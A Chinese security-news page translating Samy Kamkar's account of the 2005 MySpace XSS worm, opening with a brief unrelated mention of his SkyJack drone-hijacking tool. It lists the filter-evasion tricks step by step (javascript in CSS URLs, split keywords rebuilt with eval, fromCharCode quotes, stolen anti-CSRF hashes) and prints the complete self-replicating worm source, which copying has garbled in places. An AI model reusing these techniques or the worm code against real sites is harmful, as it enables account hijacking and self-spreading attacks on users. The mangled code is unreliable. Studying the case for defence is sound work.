当前位置:主页>产 业>技术与方法>应用技术>

世界第一个XSS攻击蠕虫的原理

Kamkar近日在Github上发布了一款软件并附上指导教程,教你如何修改无人机设置,使之认证失效并对其进行攻击。该Perl软件名为SkyJack,运行在 Raspberry Pi上并使用其它开源软件来劫持飞行器。

这一新闻让我对此人非常敬佩,翻译了他关于如何在MySpace上实现第一个XSS工具蠕虫代码的说明,翻译的过程也是对XSS攻击的一次学习过程和对黑客精神的震撼。



 

1)Myspace 屏蔽了很多标志符。事实上,他们只允许<a>,<img>类,和<div>类,或许还有其他一些(例如,<embed>类)。他们不允许<script>类,<boday>类,onClinks,onAnythings,带javascript的<href>类。但是某些浏览器(IE,部分Safari和其他)允许CSS标识符中带有javascript.即便如此,我们也需要javascript能够正常运行。例如:

<div style=”background:url(‘javascript:alert(1)’)”>

2)我们不能对Div 标识符使用引号,因为我们已经使用了单引号和双引号。这让JS的编程非常困难。为了让JS运行,我们使用表达式来保存JS代码和通过函数名来运行。例如,

<div id=”mycoce” expr=”alert(‘hah!’)”sytle=”background:url(‘javascript:eval(document.all.mycode.expr)’)”>

3)真棒,现在我们可以执行带单引号的Javascript代码了。但是,MySpace网站禁止了关键字”javascript”.为了实现目的,某些浏览器认可“java\nscript”(就是java<NEWLINE>script 为”javascript”.例如,

<divid=”mycode”expr=”alert(‘hah!’)”style=”background:url(‘javaScript:eval(document.all.mycode.expr)’)”>

4)很好,当我们让单引号其效果后,我们有时还需要双引号。我们将引号转义,例如,“foo\”bar”. Myspace 打击我一下,他们禁止了所有转义,无论是双引号还是单引号。但是,我们依然可以在javascript 中将10进制翻译成ASCII来生成引号。例如,

<div id=”mycode”expr=”alert(‘doublequota:’+String.fromCharCode(34))”style=”background:url(‘javScript:eval(document.all.mycode.expr)’)”>

5)为了将代码发布到真正展示的用户简介页面上,我们需要得到这些页面源码。为了获得包含客户ID的浏览页面的源码,我们可以使用document.body.innerHTML。但是Myspace再次打击了我,他们禁止了标识“innerHTML “.我们可以用eval函数来拼接两个字符串组成“innerHTML”.例如,

alert(eval(‘document.body.innt’+’rHTML’))

6)是时候访问其他页面了。通常我们使用”iframes”格式,但是即便是隐藏的,“iframes”并不有效,会让用户明显感到有其他东西在运行。所以我们采用AJAX(XML-HTTP)来让实际用户产生HTTP GET和POST到页面。当然,Myspace禁止了XML-HTTP请求所必需的敏感词“onreadstatechange”,我们再次使用EVAL来拼接生产该敏感词。另外,要XML-HTTP在myspace 有效果还需要Cookies.例如,

eval(‘xmlhttp.onread’+’ystatechange=callback’);

7)是时候在用户简介上执行GET来获得他们的Hero列表。我们不必删除任何heros,我们仅仅是将自己添加到已有的列表中。如果我们GET他们的简介,我们就能获取他们的列表并且保存备用。综上所述,用XML-HTTP来实现是简单的,除非我们要获得当前浏览该简介的用户ID。正如我说的,我们可以从获取页面源码来实现。好了,我们需要在页面中搜索关键词。但是如果我们这么做,我们会发现自己,因为我们的代码包含相同的关键字。我们再次使用eval()来拼接字符串来避免这个问题。

8)到此,我们有了heros列表。第一,让我们在addFriends页面执行一个XML-HTTP

POST请求把自己加到朋友列表中。欧不,这样不行,为啥?我们正在profile.myspace.com页面,但是POST动作要在www.myspace.com页面去运行。但是XML-HTTP不允许在不同域名间实现GETs/POSTs。为了避免这样,我们要去同一URL而不是在www.myspace.com页面。你可以继续从www.myspace.com 浏览简介,通过在同一域名中重新装载运行我们执行POST的页面。例如,

if(location.hostname== ‘profile.myspace.com’) document.location= ‘http://www.myspace.com’+location.pathname + location.search;

9)最后我们执行POST请求。但是,当我们发送POST请求后没有添加用户。为啥?原来Myspace为一个预POST页面生产了一个哈希值,例如在“你确定添加该用户为朋友页面”。如果这个哈希值没有与POST一同发生的话,这个POST不会成功执行。为了避免这样,在添加用户前我们模拟一个浏览器去GET该页面,通过分析源码来取得该哈希值,然后带上该哈希值去执行POST请求。

10)一旦POST请求结束,我们还要添加一个Hero和执行代码。这段代码执行完后就会到hero的同一地方,所以我们只有一个POST请求就可以了。但是,我们需要预GET一个页面来得到一个新的哈希值。但是,第一我们不得不重新生成我们要POST的代码。最简单的办法是获取我们要的页面源码,分析出代码后在发出POST请求。到此为止万事俱备。为了POST请求正在运行我们需要对代码做编码或者转义。可恶,还是不能运行。显然,javascript的URL-Encoding和escape() 函数不能转义所以必须要的代码。所以我们不得不人工来做这些工作确保必要的代码正确转义。我们添加了一条“but most of all ,samy is my hero”到代码。哇,我们自我复制了一个蠕虫代码。

11)还有其他限制,例如,最大长度,必需紧凑的代码,没有空格,混乱的命名,重复使用的函数等等。

最后附上Samy 蠕虫的源码:

<div id=mycode style="BACKGROUND:url('java   script:eval(document.all.mycode.expr)')"expr="var B=String.fromCharCode(34);varA=String.fromCharCode(39);function g(){varC;try{varD=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return  C}else{return eval('document.body.inne'+'rHTML')}}function  getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){varE=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(varO=0;O<F.length;O++){varI=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;varAS=getQueryParams();varL=AS['Mytoken'];varM=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}functiongetClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}functionparamsToString(AV){var N=new  String();var O=0;for(var P  in AV){if(O>0){N+='&'}varQ=escape(AV[P]);while(Q.indexOf('+')!=-1){QQ=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){QQ=Q.replace('&','%26')}N+=P+'='+Q;O++}return  N}function httpSend(BH,BI,BJ,BK){if(!J){return  false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return  true}function findIn(BF,BB,BC){varR=BF.indexOf(BB)+BB.length;varS=BF.substring(R,R+1024);returnS.substring(0,S.indexOf(BC))}functiongetHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';varV=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else  if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=newActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return  Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);varAD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);varAF;if(AE){AEAE=AE.replace('jav'+'a',A+'jav'+'a');AEAE=AE.replace('exp'+'r)','exp'+'r)'+A);AF='  but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}varAU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AGAG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var  AR=getFromURL(AU,'Mytoken');var  AS=new  Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&MytokenMytoken='+AR,postHero,'POST',paramsToString(AS))}}}functionpostHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var  AS=new  Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function  main(){var AN=getClientFID();varBH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&MytokenMytoken='+L,processxForm,'GET')}functionprocessxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var  AS=new  Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to  Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function  httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return  false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return  true}"></DIV>

(责任编辑:安博涛)

相关阅读:

分享到:

更多
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
  • 微笑/wx
  • 撇嘴/pz
  • 抓狂/zk
  • 流汗/lh
  • 大兵/db
  • 奋斗/fd
  • 疑问/yw
  • 晕/y
  • 偷笑/wx
  • 可爱/ka
  • 傲慢/am
  • 惊恐/jk
用户名: 验证码:点击我更换图片
最新评论 进入详细评论页>>
最新内容
资料下载专区
热点内容
图文资讯

网络安全:互联网安全 如何防范木马及病毒

网络安全:互联网安全 如何防范木马及病毒的攻击

一、计算机中毒有哪些症状? 人生病了,会有各种各样的症状,同样,电脑中毒了也会有...[详细]

加强网站服务器安全维护的技巧

加强网站服务器安全维护的技巧

计算机系统服务器的维护工作十分重要,稍有不慎就会使整个网络陷入瘫痪。目前,网络经...[详细]

电脑离线就安全?这个软件一样能远程窃取数

电脑离线就安全?这个软件一样能远程窃取数据

以色列的一个研究团队已改良了窃取离线电脑数据的方法。人们一直认为这种离线电脑在面...[详细]

如何在Linux上最妥善地管理加密密钥?

如何在Linux上最妥善地管理加密密钥?

存储SSH加密密钥和牢记密码可能是一件让人很头痛的事儿。不过遗憾的是,在如今恶意黑...[详细]

如何在 Linux 上运行命令前临时清空 Bash

如何在 Linux 上运行命令前临时清空 Bash 环境变量

我是个 bash shell 用户。我想临时清空 bash shell 环境变量。但我不想删除或者 unset...[详细]

返回首页 返回顶部
Copyright © 2008-2015 版权所有 国工信科技发展(北京)有限公司 Power by DedeCms
邮箱:secdoctor007@163.com
关于我们 | 联系我们 | 人才招聘 | 法律说明 | 站点地图 | 留言
京ICP备09032960号-4